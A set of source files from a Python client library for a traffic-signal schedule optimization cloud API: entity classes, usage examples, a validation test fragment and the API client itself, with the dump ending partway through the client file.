GIVEN\n signalgroup1 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[conflict])\n\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=90, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=33, end_greenyellow=60)],\n sg2=[GreenYellowInterval(start_greenyellow=12, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=62, end_greenyellow=87)]), period=100)\n\n for signalgroup_id, interval_index, interval_shift in product([\"sg1\", \"sg2\"], [0, 1], [0]):\n with self.subTest(f\"signalgroup_id={signalgroup_id}, interval_index={interval_index}, \"\n f\"interval_shift={interval_shift}\"):\n # adjusting schedule such that the start of greenyellow interval 'interval_index' of signalgroup_id\n # violates the minimum clearance time\n fts_copy = deepcopy(fts)\n if signalgroup_id == \"sg1\":\n fts_copy._greenyellow_intervals[\"sg1\"][interval_index].start_greenyellow = \\\n (fts_copy._greenyellow_intervals[\"sg2\"][(interval_index + 1) % 2].end_greenyellow +\n conflict.setup21 - 1) % fts_copy.period\n if signalgroup_id == \"sg2\":\n fts_copy._greenyellow_intervals[\"sg2\"][interval_index].start_greenyellow = \\\n (fts_copy._greenyellow_intervals[\"sg1\"][interval_index].end_greenyellow +\n conflict.setup12 - 1) % fts_copy.period\n\n fts_copy._greenyellow_intervals[\"sg2\"] = fts_copy._greenyellow_intervals[\"sg2\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg2\"][interval_shift:]\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_conflicts(intersection=intersection, fts=fts_copy)\n\n # THEN an error should be raised\n"
},
{
"alpha_fraction": 0.7344650626182556,
"alphanum_fraction": 0.7392696738243103,
"avg_line_length": 47.03076934814453,
"blob_id": "a5ab48ddc9b1735d0b39f99a6197d1b0fcbcd29d",
"content_id": "b5db798325b2f08edbc29e9955fad83426ddbafe",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3122,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 65,
"path": "/swift_cloud_py/examples/optimize_multiple_schedules.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef optimize_multiple_schedules():\n \"\"\"\n Example showing how to:\n - retrieve intersection information and arrival rates from a json file exported from Swift Mobility Desktop.\n - use this information to optimize fixed-time schedules\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Minimizing average experienced delay\")\n best_fixed_time_schedule, best_phase_diagram, objective_value, warm_start_info = \\\n SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n logging.info(best_fixed_time_schedule)\n logging.info(best_phase_diagram)\n\n logging.info(f\"Finding second best schedule\")\n second_best_fixed_time_schedule, second_best_phase_diagram, objective_value, warm_start_info = \\\n SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, fixed_time_schedules_to_exclude=[best_fixed_time_schedule],\n warm_start_info=warm_start_info)\n\n logging.info(f\"Average experienced delay of second best schedule: {objective_value:.2f} seconds\")\n logging.info(second_best_fixed_time_schedule)\n logging.info(second_best_phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n optimize_multiple_schedules()\n"
},
{
"alpha_fraction": 0.7168891429901123,
"alphanum_fraction": 0.7266427278518677,
"avg_line_length": 50.9466667175293,
"blob_id": "ba100c230a97c4eb18097c8f6c4178fadf11eb53",
"content_id": "f2717f5383b8524cbb55ff320dcc911ed3ee0747",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3896,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 75,
"path": "/swift_cloud_py/examples/tune_fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef tune_fixed_time_schedule(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example we show how to tune a fixed-time schedule.\n\n Use case: Traffic situations change throughout the day. This function allows you to quickly adapt the green times\n of an existing fixed-time schedule to a new traffic situations. This can be used, for example, to adapt the\n maximum greenyellow times of a smart traffic light controller to the current traffic situation in real-time.\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # the more the traffic situation changes, the more effect tuning the fixed-time schedule has. In this example,\n # we only scale the amount of traffic.\n for scaling_factor in [0.95, 0.9, 0.7, 0.4]:\n logging.info(f\"Evaluating schedule for situation with {(1-scaling_factor)*100 :.1f}% less traffic\")\n\n arrival_rates_scaled = arrival_rates * scaling_factor\n\n kpis = SwiftMobilityCloudApi.evaluate_fts(intersection=intersection, fixed_time_schedule=fixed_time_schedule,\n arrival_rates=arrival_rates_scaled, horizon=2)\n\n logging.info(f\"Average experienced delay without tuning: {kpis.delay:.2f} seconds\")\n\n logging.info(f\"Tuning schedule for situation with {(1-scaling_factor)*100 :.1f}% less traffic\")\n\n tuned_fixed_time_schedule, objective_value = SwiftMobilityCloudApi.get_tuned_fts(\n intersection=intersection, fixed_time_schedule=fixed_time_schedule, arrival_rates=arrival_rates_scaled,\n min_period_duration=30, max_period_duration=180, objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay after tuning: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n"
},
{
"alpha_fraction": 0.6846493482589722,
"alphanum_fraction": 0.721677303314209,
"avg_line_length": 54.10810852050781,
"blob_id": "10e9a23c1467c47994512d8ef14a66f1eaf74f0e",
"content_id": "38433cd88265409eda3644325a1dac34c5b66998",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4078,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 74,
"path": "/swift_cloud_py/examples/fixing_periodic_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\n\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef fix_order_and_optimize():\n \"\"\"\n This example shows how to ask for a fixed-time schedule that adheres to a specified fix order in which\n the signalgroups should receive their greenyellow interval.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # signal group consisting of two traffic light allowing 1 or 2 greenyellow intervals per repeating period.\n traffic_light1 = TrafficLight(capacity=1800, lost_time=2.2)\n traffic_light2 = TrafficLight(capacity=1810, lost_time=2.1)\n signalgroup1 = SignalGroup(id=\"2\", traffic_lights=[traffic_light1, traffic_light2], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100, min_nr=1, max_nr=2)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light3 = TrafficLight(capacity=1650, lost_time=3.0)\n signalgroup2 = SignalGroup(id=\"5\", traffic_lights=[traffic_light3], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light4 = TrafficLight(capacity=1800, lost_time=2.1)\n signalgroup3 = SignalGroup(id=\"8\", traffic_lights=[traffic_light4], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # conflicts & clearance times\n conflict12 = Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=1, setup21=2)\n conflict13 = Conflict(id1=signalgroup1.id, id2=signalgroup3.id, setup12=2, setup21=1)\n conflict23 = Conflict(id1=signalgroup2.id, id2=signalgroup3.id, setup12=2, setup21=3)\n\n # initialize intersection object\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23])\n\n # set associated arrival rates\n arrival_rates = ArrivalRates(id_to_arrival_rates={\"2\": [800, 700], \"5\": [150], \"8\": [180]})\n logging.info(f\"Not yet requesting any fixed order of greenyellow intervals\")\n logging.info(f\"Minimizing average experienced delay\")\n # optimize fixed-time schedule\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay {objective_value: .3f} seconds\")\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n logging.info(f\"Requesting order: 2 -> 8 -> 5 -> \")\n # initialize intersection object\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23],\n periodic_orders=[PeriodicOrder(order=[\"2\", \"8\", \"5\"])])\n logging.info(f\"Minimizing average experienced delay\")\n # optimize fixed-time schedule\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay {objective_value: .3f} seconds\")\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n fix_order_and_optimize()\n"
},
{
"alpha_fraction": 0.6581421494483948,
"alphanum_fraction": 0.6581421494483948,
"avg_line_length": 49.1698112487793,
"blob_id": "9b9a8f1de0dad8db4e63ecc2a108ba34247c3f2c",
"content_id": "f48554d4880d1e1efbbf7f5152e3833c26087058",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2659,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 53,
"path": "/swift_cloud_py/entities/scenario/queue_lengths.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using ArrivalRates-typing inside ArrivalRates-class\n\nfrom typing import Dict, List\n\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\nclass QueueLengths:\n \"\"\"Arrival rates of all traffic lights\"\"\"\n def __init__(self, id_to_queue_lengths: Dict[str, List[float]]) -> None:\n \"\"\"\n :param id_to_queue_lengths: mapping of signalgroup id to a list of queue lengths (in personal car equivalent)\n for the associated traffic lights (in signalgroup.traffic_lights);\n We include these queue lengths implicitly in the arrival rate of this queue: we assume that the traffic in\n the initial queue arrives (evenly spread) during the horizon.\n return: -\n \"\"\"\n self.id_to_queue_lengths = id_to_queue_lengths\n\n # raises ValueError if validation does not succeed\n self._validate()\n\n def to_json(self):\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return self.id_to_queue_lengths\n\n def _validate(self) -> None:\n \"\"\" Validate input arguments of QueueLengths; raises ValueError if validation does not pass\"\"\"\n # validate structure of id_to_queue_lengths\n error_message = \"id_to_queue_lengths should be a dictionary mapping from a signal group id (str) to \" \\\n \"a list of queue lengths (List[float])\"\n if not isinstance(self.id_to_queue_lengths, dict):\n raise ValueError(error_message)\n for _id, queue_lengths in self.id_to_queue_lengths.items():\n if not isinstance(_id, str):\n raise ValueError(error_message)\n if not isinstance(queue_lengths, list):\n raise ValueError(error_message)\n for queue_length in queue_lengths:\n if not isinstance(queue_length, (float, int)):\n raise ValueError(error_message)\n\n @staticmethod\n def from_json(queue_lengths_dict) -> QueueLengths:\n \"\"\"Loading arrival rates from json (expected same json structure as generated with to_json)\"\"\"\n return QueueLengths(id_to_queue_lengths=queue_lengths_dict)\n\n def __truediv__(self, time: float) -> ArrivalRates:\n \"\"\" divide the queue length by a time interval ('other' in hours) to get a rate in PCE/h\"\"\"\n if not isinstance(time, (int, float)):\n raise ArithmeticError(\"can divide queue_lengths rates only by float\")\n id_to_arrival_rates = {id_: [rate/time for rate in rates] for id_, rates in self.id_to_queue_lengths.items()}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n"
},
{
"alpha_fraction": 0.6608046889305115,
"alphanum_fraction": 0.6650679707527161,
"avg_line_length": 56.738460540771484,
"blob_id": "d74eef56f06701218304b3eeb490f505e48ef24e",
"content_id": "8aeaa76f062c24c191c7c60bc421b87bdb3f969b",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3753,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 65,
"path": "/swift_cloud_py/entities/intersection/traffic_light.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using TrafficLight-typing inside TrafficLight-class\n\nfrom typing import Optional, Dict\n\n\nclass TrafficLight:\n def __init__(self, capacity: float, lost_time: float, weight: Optional[float] = 1.0,\n max_saturation: Optional[float] = None) -> None:\n \"\"\"\n Traffic light object for which we want to plan greenyellow intervals. A greenyellow interval is a generic\n representation of the green interval itself and any other signal state (other than the pure red signal state)\n leading up to or following the green interval. For example, in the Netherlands the greenyellow interval would\n consist of the green interval followed by a yellow interval. In the UK, this greenyellow interval would consist\n of a yellow-red interval, followed by a green interval, succeeded by a yellow interval.\n :param capacity: capacity in PCE/h (personal car equivalent per hour)\n :param lost_time: time (in seconds) that is 'lost' every greenyellow interval due to accelerations (at start)\n and people stopping before the end of the yellow interval (if yellow follows green); the amount of PCE that\n is expected to depart during a greenyellow interval of gy seconds is (gy - lost_time) * capacity\n :param weight: importance of this traffic light (larger means more important); only relevant when\n minimizing the expected waiting time (delay) at the traffic lights; the delay at a traffic light with weight=2.0\n counts twice as hard as a delay at a traffic light with weight=1.0.\n :param max_saturation: maximum allowed saturation (1.0 is at the verge of oversaturation).\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.capacity = float(capacity) # store capacity in PCE/second (instead of PCE/h)\n self.max_saturation = float(max_saturation) if max_saturation is not None else None\n self.lost_time = float(lost_time)\n self.weight = float(weight)\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n # dict creates copy preventing modifying original object\n json_dict = dict(self.__dict__)\n # moreover we remove items with None value; the max saturation should not be specified in the cloud-api\n # if it is None\n if self.max_saturation is None:\n del json_dict[\"max_saturation\"]\n return json_dict\n\n @staticmethod\n def from_json(traffic_light_dict: Dict) -> TrafficLight:\n \"\"\"Loading traffic light from json (expected same json structure as generated with to_json)\"\"\"\n return TrafficLight(capacity=traffic_light_dict[\"capacity\"],\n lost_time=traffic_light_dict[\"lost_time\"],\n weight=traffic_light_dict[\"weight\"],\n max_saturation=traffic_light_dict[\"max_saturation\"]\n if \"max_saturation\" in traffic_light_dict else None)\n\n def _validate(self) -> None:\n \"\"\"\n validate the arguments provided to this object\n :return: - (raises error if validation does not pass)\n \"\"\"\n if self.max_saturation is not None and self.max_saturation <= 0.0:\n raise ValueError(\"max_saturation must be None or a positive float\")\n\n if not self.weight >= 0.0:\n raise ValueError(\"weight must be a non-negative float\")\n\n if not self.capacity > 0.0:\n raise ValueError(\"capacity must be a positive float\")\n\n if not self.lost_time >= 0.0:\n raise ValueError(\"lost_time must be a non-negative float\")\n"
},
{
"alpha_fraction": 0.6732481718063354,
"alphanum_fraction": 0.6776306629180908,
"avg_line_length": 59.04709243774414,
"blob_id": "2aef76d7ea887d976b3edc018bc9fb4a8108e371",
"content_id": "3f7c6b9dfb59cee8eeeeb1c5872456e5dee17b17",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21677,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 361,
"path": "/swift_cloud_py/swift_cloud_api.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\nfrom typing import Tuple, Optional, List, Dict\n\nimport requests\nfrom requests import Response\n\nfrom swift_cloud_py.authentication.authentication import authenticate\nfrom swift_cloud_py.common.errors import UnauthorizedException, BadRequestException, \\\n UnknownCloudException, SafetyViolation\nfrom swift_cloud_py.authentication.check_internet_connection import ensure_has_internet\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.control_output.phase_diagram import PhaseDiagram\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.kpis.kpis import KPIs\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\nfrom swift_cloud_py.entities.scenario.queue_lengths import QueueLengths\nfrom swift_cloud_py.enums import ObjectiveEnum\n\n# allows using a test version of the api hosted at a different url (for testing purposes).\nfrom swift_cloud_py.validate_safety_restrictions.validate import validate_safety_restrictions\n\nCLOUD_API_URL = os.environ.get(\"smc_api_url\", \"https://cloud-api.swiftmobility.eu\")\n\nCONNECTION_ERROR_MSG = \"Connection with swift mobility cloud api could not be established\"\nHORIZON_LB_EXCEEDED_MSG = \"horizon should exceed one hour\"\n\n\ndef check_status_code(response: Response) -> None:\n \"\"\"\n check status code returned by rest-api call; raises appropriate error if status code indicates that the call was\n not succesfull.\n \"\"\"\n if response.status_code in [400]:\n raise BadRequestException(str(response.json()))\n elif response.status_code in [401]:\n raise UnauthorizedException(\"JWT validation failed: Missing or invalid credentials\")\n elif response.status_code in [402]:\n raise UnauthorizedException(\"Insufficient credits (cpu seconds) left.\")\n elif response.status_code in [403]:\n raise UnauthorizedException(\"Forbidden.\")\n elif response.status_code in [426]:\n raise UnauthorizedException(f\"The cloud api is still in the beta phase; this means it might change. \"\n f\"Message from cloud: {response.json()['msg']}.\")\n elif response.status_code in [504]:\n raise TimeoutError\n elif response.status_code != 200:\n raise UnknownCloudException(f\"Unknown status code (={response.status_code}) returned\")\n\n\nclass SwiftMobilityCloudApi:\n \"\"\"\n Class to communicate with the cloud-api of swift mobility (and automating authentication).\n Using this class simplifies the communication with the cloud-api (compared to using the rest-api's directly)\n \"\"\"\n _authentication_token: str = None # this token is updated by the @authenticate decorator\n\n @classmethod\n def get_authentication_header(cls):\n return {'authorization': 'Bearer {0:s}'.format(cls._authentication_token)}\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def get_optimized_fts(cls, intersection: Intersection, arrival_rates: ArrivalRates,\n horizon: float = 2.0,\n min_period_duration: float = 0.0, max_period_duration: float = 180,\n objective: ObjectiveEnum = ObjectiveEnum.min_delay,\n initial_queue_lengths: Optional[QueueLengths] = None,\n fixed_time_schedules_to_exclude: Optional[List[FixedTimeSchedule]] = None,\n warm_start_info: Optional[Dict] = None,\n ) -> Tuple[FixedTimeSchedule, PhaseDiagram, float, dict]:\n \"\"\"\n Optimize a fixed-time schedule\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates; each arrival rate is specified in personal car equivalent per hour (PCE/h)\n cyclists per hour or pedestrians per hour\n :param horizon: time period of interest in hours.\n :param min_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param max_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param objective: what kpi (key performance indicator) to optimize. The following options are available:\n - ObjectiveEnum.min_delay: minimize the delay experienced by road users arriving at the intersection during\n the next 'horizon' hours. The initially waiting traffic is modeled as implicitly by increasing the\n arrival rate by initial_queue_length / horizon PCE/h; this implies that we assume that this traffic is arriving\n (evenly spread) during the horizon.\n - ObjectiveEnum.min_period: search for the fixed-time schedule with the smallest period duration for which\n all traffic lights are 'stable', i.e., the greenyellow interval is large enough so that the amount of traffic\n that can (on average) depart during the horizon exceeds the traffic that arrives during\n the horizon (+ initially waiting traffic).\n - ObjectiveEnum.max_capacity: search for the fixed-time schedule that can handle the largest (percentual)\n increase in traffic (including the initial amount of traffic), i.e., the largest percentual increase in traffic\n for which all traffic lights are 'stable' (see also ObjectiveEnum.min_period). This objective function\n disregards the maximum saturation of each traffic light (we assume the maximum saturation is 1 for each\n traffic light).\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic. The unit of each queue-length should align with the unit used for the arrival rate;\n if the arrival rate is specified in PCE/h then the queue-length needs to be specified in PCE.\n :return: fixed-time schedule, associated phase diagram and the objective value\n (minimized delay, minimized period, or maximum percentual increase in traffic divided by 100, e.g. 1 means\n currently at the verge of stability)\n :param fixed_time_schedules_to_exclude: the fixed-time schedules that we want to exclude; this can be used to find\n the second best schedule by excluding the best one.\n :param warm_start_info: each optimization returns some information\n (usually in the format {\"id\": \"some identification string\"}); if you want to compute the second best schedule\n (by excluding the best schedule), then you can also provide the warm_start_info returned with the best schedule;\n this will significantly speedup computations when trying to find the second best one.\n \"\"\"\n assert horizon >= 1, HORIZON_LB_EXCEEDED_MSG\n if initial_queue_lengths is None:\n # assume no initial traffic\n initial_queue_lengths = QueueLengths({signalgroup.id: [0] * len(signalgroup.traffic_lights)\n for signalgroup in intersection.signalgroups})\n\n check_all_arrival_rates_and_queue_lengths_specified(intersection=intersection, arrival_rates=arrival_rates,\n initial_queue_lengths=initial_queue_lengths)\n\n if fixed_time_schedules_to_exclude is not None:\n for fixed_time_schedule in fixed_time_schedules_to_exclude:\n try:\n validate_safety_restrictions(intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n except SafetyViolation as e:\n logging.error(f\"One of the fixed-time schedules in fixed_time_schedules_to_exclude' does not\"\n f\"satisfy all safety restrictions. The violation: {e}\")\n raise SafetyViolation(e)\n\n endpoint = f\"{CLOUD_API_URL}/fts-optimization\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n # rest-api call\n try:\n # assume that the traffic that is initially present arrives during the horizon.\n corrected_arrival_rates = arrival_rates + initial_queue_lengths / horizon\n json_dict = dict(\n intersection=intersection.to_json(),\n arrival_rates=corrected_arrival_rates.to_json(),\n min_period_duration=min_period_duration,\n max_period_duration=max_period_duration,\n objective=objective.value,\n )\n if fixed_time_schedules_to_exclude is not None:\n json_dict[\"fts_to_exclude\"] = [fts.to_json() for fts in fixed_time_schedules_to_exclude]\n if warm_start_info is not None:\n json_dict[\"warm_start_info\"] = warm_start_info\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n\n # parse output\n output = r.json()\n objective_value = output[\"obj_value\"]\n fixed_time_schedule = FixedTimeSchedule.from_json(output[\"fixed_time_schedule\"])\n # check if safety restrictions are satisfied; raises a SafetyViolation-exception if this is not the case.\n validate_safety_restrictions(intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n phase_diagram = PhaseDiagram.from_json(output[\"phase_diagram\"])\n\n warm_start_info = output.get(\"warm_start_info\", dict())\n\n return fixed_time_schedule, phase_diagram, objective_value, warm_start_info\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def get_tuned_fts(cls, intersection: Intersection, arrival_rates: ArrivalRates,\n fixed_time_schedule: FixedTimeSchedule, horizon: float = 2.0,\n min_period_duration: float = 0.0, max_period_duration: float = 180,\n objective: ObjectiveEnum = ObjectiveEnum.min_delay,\n initial_queue_lengths: Optional[QueueLengths] = None) \\\n -> Tuple[FixedTimeSchedule, float]:\n \"\"\"\n Tune a fixed-time schedule; tune the greenyellow times to a new situation but keep the 'structure' of this\n fixed-time schedule the same (the phase diagram remains the same).\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates; each arrival rate is specified in personal car equivalent per hour (PCE/h)\n cyclists per hour or pedestrians per hour\n :param fixed_time_schedule: fixed-time schedule to tune.\n :param horizon: time period of interest in hours.\n :param min_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param max_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param objective: what kpi (key performance indicator) to optimize. The following options are available:\n - ObjectiveEnum.min_delay: minimize the delay experienced by road users arriving at the intersection during\n the next 'horizon' hours. The initially waiting traffic is modeled as implicitly by increasing the\n arrival rate by initial_queue_length / horizon PCE/h; this implies that we assume that this traffic is arriving\n (evenly spread) during the horizon.\n - ObjectiveEnum.min_period: search for the fixed-time schedule with the smallest period duration for which\n all traffic lights are 'stable', i.e., the greenyellow interval is large enough so that the amount of traffic\n that can (on average) depart during the horizon exceeds the traffic that arrives during\n the horizon (+ initially waiting traffic).\n - ObjectiveEnum.max_capacity: search for the fixed-time schedule that can handle the largest (percentual)\n increase in traffic (including the initial amount of traffic), i.e., the largest percentual increase in traffic\n for which all traffic lights are 'stable' (see also ObjectiveEnum.min_period).\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic. The unit of each queue-length should align with the unit used for the arrival rate;\n if the arrival rate is specified in PCE/h then the queue-length needs to be specified in PCE.\n :return: fixed-time schedule, associated phase diagram and the objective value\n (minimized delay, minimized period, or maximum percentual increase in traffic divided by 100, e.g. 1 means\n currently at the verge of stability)\n \"\"\"\n assert horizon >= 1, HORIZON_LB_EXCEEDED_MSG\n if initial_queue_lengths is None:\n # assume no initial traffic\n initial_queue_lengths = QueueLengths({signalgroup.id: [0] * len(signalgroup.traffic_lights)\n for signalgroup in intersection.signalgroups})\n\n check_all_arrival_rates_and_queue_lengths_specified(intersection=intersection, arrival_rates=arrival_rates,\n initial_queue_lengths=initial_queue_lengths)\n\n endpoint = f\"{CLOUD_API_URL}/fts-tuning\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n\n # rest-api call\n try:\n # assume that the traffic that is initially present arrives during the horizon.\n corrected_arrival_rates = arrival_rates + initial_queue_lengths / horizon\n json_dict = dict(\n intersection=intersection.to_json(),\n fixed_time_schedule=fixed_time_schedule.to_json(),\n arrival_rates=corrected_arrival_rates.to_json(),\n min_period_duration=min_period_duration,\n max_period_duration=max_period_duration,\n objective=objective.value\n )\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, 